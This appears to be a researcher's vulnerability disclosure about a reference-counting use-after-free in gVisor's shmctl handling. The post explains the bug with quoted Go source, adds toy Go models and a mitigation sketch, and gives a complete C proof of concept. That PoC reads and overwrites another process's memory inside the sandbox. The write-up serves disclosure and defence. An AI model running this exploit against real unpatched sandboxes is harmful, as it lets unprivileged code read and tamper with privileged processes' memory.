Privilege Escalation in gVisor, Google's Container Sandbox

tl;dr gVisor is Google’s sandboxing technology for containers running less-than-fully-trusted code. It’s a Golang reimplementation of the Linux kernel that runs in userspace, intercepting container syscalls and limiting what touches the host kernel directly. I found an issue with gVisor’s shared memory implementation that allowed unprivileged processes in the sandbox to read and write the memory of other, more highly privileged processes in the sandbox, including those running as root.

[edit: Please note that this is not a sandbox escape; gaining root within gVisor does not give you access to the host machine. I encourage you to check out the gVisor README for more details!]

I recorded a video of a proof-of-concept that reads and overwrites some memory in an unrelated process (code at the end of the post).

Vulnerability

Mapped-after-free

gVisor uses reference counting for various parts of its internal memory management. The bug lets us lower the reference count of the “platform” memory backing a shmget shared memory region while we still have that region mapped into our process’s virtual address space. The backing memory is then reclaimed and handed to another (potentially more privileged) process, which uses it for something else while our mapping still points at it. In effect, the bug is a use-after-free.

The problem stems from this code in sys_shm.go, which implements the shmctl syscall:

func Shmctl(t *kernel.Task, args arch.SyscallArguments) (uintptr, *kernel.SyscallControl, error) {
  id := args[0].Int()
  cmd := args[1].Int()
  buf := args[2].Pointer()
...
  switch cmd {
...
  case linux.IPC_RMID:
    segment.MarkDestroyed()
    return 0, nil, nil

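segment.MarkDestroyed() unconditionally decreases the reference count of the shared memory object: nothing checks whether the segment has already been marked for destruction, so every IPC_RMID call drops another reference. Once the object's count runs out, destroy() also decreases the reference count of the platform memory range itself, in shm.go: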

func (s *Shm) destroy() {
  s.registry.remove(s)
  s.p.Memory().DecRef(s.fr)
}

func (s *Shm) MarkDestroyed() {
  s.mu.Lock()
  defer s.mu.Unlock()
  // Prevent the segment from being found in the registry.
  s.key = linux.IPC_PRIVATE
  s.pendingDestruction = true
  // destroy() above will get called when the reference count goes negative
  s.DecRef()
}

So if the platform memory range s.fr has a reference count of 1, we can call shmctl(shmid, IPC_RMID, NULL) repeatedly until we trigger the destruction of the Shm object. At that point the backing memory can be reclaimed by gVisor's kernel for use by other processes, even though our mapping is still in place.
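To make the counting concrete, here is a minimal toy model in Go. It is not gVisor code: the backing and shm types, their fields, and the guarded variant are all hypothetical. It also assumes that shmget leaves one reference on the segment and that shmat adds a second one for the mapping, and it frees at a count of zero for simplicity. The guarded variant is one plausible way to stop repeated IPC_RMID calls from draining the count, not necessarily the fix gVisor adopted.

```go
package main

import "fmt"

// backing is a toy stand-in for a reference-counted platform memory range.
type backing struct {
	refs  int
	freed bool
}

func (b *backing) decRef() {
	b.refs--
	if b.refs == 0 {
		b.freed = true // the range can now be handed to another process
	}
}

// shm is a toy stand-in for a shared memory segment (hypothetical, not gVisor's Shm).
type shm struct {
	refs               int
	pendingDestruction bool
	mem                *backing
}

func (s *shm) decRef() {
	s.refs--
	if s.refs == 0 {
		s.mem.decRef() // mirrors destroy() releasing the backing range
	}
}

// markDestroyedUnguarded mirrors the excerpt: every call drops a reference.
func (s *shm) markDestroyedUnguarded() {
	s.pendingDestruction = true
	s.decRef()
}

// markDestroyedGuarded drops a reference only on the first call.
func (s *shm) markDestroyedGuarded() {
	if s.pendingDestruction {
		return
	}
	s.pendingDestruction = true
	s.decRef()
}

// freedWhileMapped simulates shmget, shmat, and two IPC_RMID calls. The
// mapping is never detached, so a true result means the backing range was
// freed while still mapped.
func freedWhileMapped(guarded bool) bool {
	s := &shm{refs: 1, mem: &backing{refs: 1}} // shmget: creation reference (assumed)
	s.refs++                                    // shmat: the mapping takes a reference (assumed)
	for i := 0; i < 2; i++ {
		if guarded {
			s.markDestroyedGuarded()
		} else {
			s.markDestroyedUnguarded()
		}
	}
	return s.mem.freed
}

func main() {
	fmt.Println("unguarded, freed while mapped:", freedWhileMapped(false))
	fmt.Println("guarded, freed while mapped:", freedWhileMapped(true))
}
```

In this model the unguarded variant reports true and the guarded one reports false: the second IPC_RMID is what takes away the reference that the mapping was relying on.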

The platform memory’s reference count is initialized to 1 when we create our shared memory object with shmget(), but it gets incremented to 2 when the memory is first accessed and page-faulted in. So if you read from or write to the mapped shared memory region before triggering the DecRef() bug, the single DecRef() in destroy() no longer releases the memory, and things become harder to exploit.
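The arithmetic is small enough to sketch directly. The frameRange type and releasedAfterDestroy function below are hypothetical names for illustration; the only facts taken from the description above are the initial count of 1, the increment on first access, and the single decrement when the segment is destroyed.

```go
package main

import "fmt"

// frameRange is a hypothetical stand-in for a platform memory range.
type frameRange struct {
	refs int
}

// releasedAfterDestroy models the backing range's count across shmget(),
// an optional first access, and the segment's destroy(). It reports whether
// the range ends up with no references left.
func releasedAfterDestroy(touchedFirst bool) bool {
	f := &frameRange{refs: 1} // shmget(): initial reference
	if touchedFirst {
		f.refs++ // first access faults the page in and takes a second reference
	}
	f.refs-- // destroy(): the segment drops its reference
	return f.refs == 0
}

func main() {
	fmt.Println("untouched region released:", releasedAfterDestroy(false))
	fmt.Println("touched region released:", releasedAfterDestroy(true))
}
```

This is why the order of operations matters: the mapping has to stay untouched until after the segment has been destroyed.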

Here’s the proof-of-concept I put together for the video above, with comments explaining how it works:

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/shm.h>
#include <unistd.h>

#define SHMKEY 1234567

#define SHMSIZE ((size_t) 4096)

int main()
{
  // Fork off a process that allocates a bunch of memory containing the string
  // 'OOPS', and that will exit if it ever finds an 'A' byte in that string
  // (indicating that the memory has been overwritten by another process)
  if (fork() == 0) {
    sleep(1);
    // The argument list must end with a null pointer of type char *
    execl("/usr/bin/python3", "python", "-c", "x = 'OOPS'\n"
                                              "while True:\n\t"
                                                "x += 'OOPS'\n\t"
                                                "if 'A' in x:\n\t\t"
                                                  "print('\\n\\n***Other process: memory was overwritten***')\n\t\t"
                                                  "exit(0)\n", (char *)NULL);
    return 0;
  }

  // Create a readable, writable shared memory region
  int shmid = shmget(SHMKEY, SHMSIZE, IPC_CREAT | 0600);
  if (shmid == -1) {
    perror("shmget");
    return 1;
  }

  // Map that shared memory into our virtual address space
  volatile unsigned char *shmm = shmat(shmid, NULL, 0);
  if (shmm == (void *) -1) {
    perror("shmat");
    return 1;
  }

  printf("shmm addr: %p\n", (void *)shmm);
  printf("Decreasing refcount\n");

  // Trigger our bug by releasing the platform memory backing the shared memory
  shmctl(shmid, IPC_RMID, NULL);
  shmctl(shmid, IPC_RMID, NULL);

  // Give the Python process some time to use up memory
  sleep(2);

  printf("Allocation from another process:\n");

  // Print out some bytes from the page, which has probably been allocated to
  // the Python process's big string
  for (size_t i = 0; i < 200; i++) {
    if (i % 20 == 0) {
      printf("\n");
    }
    if (shmm[i] != 0) printf("\x1B[32m");
    printf("%02X ", shmm[i]);
    if (shmm[i] != 0) printf("\x1B[0m");
    fflush(stdout);
  }

  // Demonstrate that we can overwrite the other process's memory. The other
  // process should exit once it detects that we've overwritten part of the
  // string with 0x41
  memset((char *)shmm, 0x41, SHMSIZE);

  // Sleep for a couple seconds so that we don't instantly panic
  sleep(2);

  // When the process exits, the kernel will attempt to DecRef an object whose
  // refcount is already negative, so it panics.
  printf("\nTime to panic...\n");

  return 0;
}

Conclusion

gVisor is a well-written but incredibly ambitious project; reimplementing the Linux kernel is hard. I’ve been thinking about ways to detect and mitigate this class of bug. Perhaps when a memory region is DecRef()ed to 0, the kernel could check that it isn’t still mapped in any process’s virtual address space, though I’m not sure whether that would be too expensive.
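As a rough sketch of what such a check might look like, here is a toy version in Go. Everything in it is an assumption made for illustration: the fileRange and addressSpace types, the stillMappedBy helper, and the idea that each process's mappings are available as a flat list. gVisor's real data structures are different.

```go
package main

import "fmt"

// fileRange is a half-open range [start, end) of backing memory (hypothetical type).
type fileRange struct{ start, end uint64 }

// overlaps reports whether the two ranges share at least one byte.
func (r fileRange) overlaps(o fileRange) bool {
	return r.start < o.end && o.start < r.end
}

// addressSpace lists the backing ranges a process currently has mapped (hypothetical type).
type addressSpace struct {
	pid      int
	mappings []fileRange
}

// stillMappedBy returns the PIDs whose address spaces map any part of fr.
// A release path could call this when a count reaches zero and refuse to
// free the range if the result is non-empty.
func stillMappedBy(spaces []addressSpace, fr fileRange) []int {
	var pids []int
	for _, as := range spaces {
		for _, m := range as.mappings {
			if m.overlaps(fr) {
				pids = append(pids, as.pid)
				break
			}
		}
	}
	return pids
}

func main() {
	spaces := []addressSpace{
		{pid: 10, mappings: []fileRange{{0x1000, 0x2000}}},
		{pid: 11, mappings: []fileRange{{0x8000, 0x9000}}},
	}
	released := fileRange{0x1000, 0x2000}
	if pids := stillMappedBy(spaces, released); len(pids) > 0 {
		fmt.Println("refusing to release range still mapped by:", pids)
	}
}
```

Written this way, the check walks every mapping of every process on each release, which is exactly the cost I'm worried about. An index from backing ranges to the mappings that use them would make it cheaper, but that index is more bookkeeping that has to be kept correct.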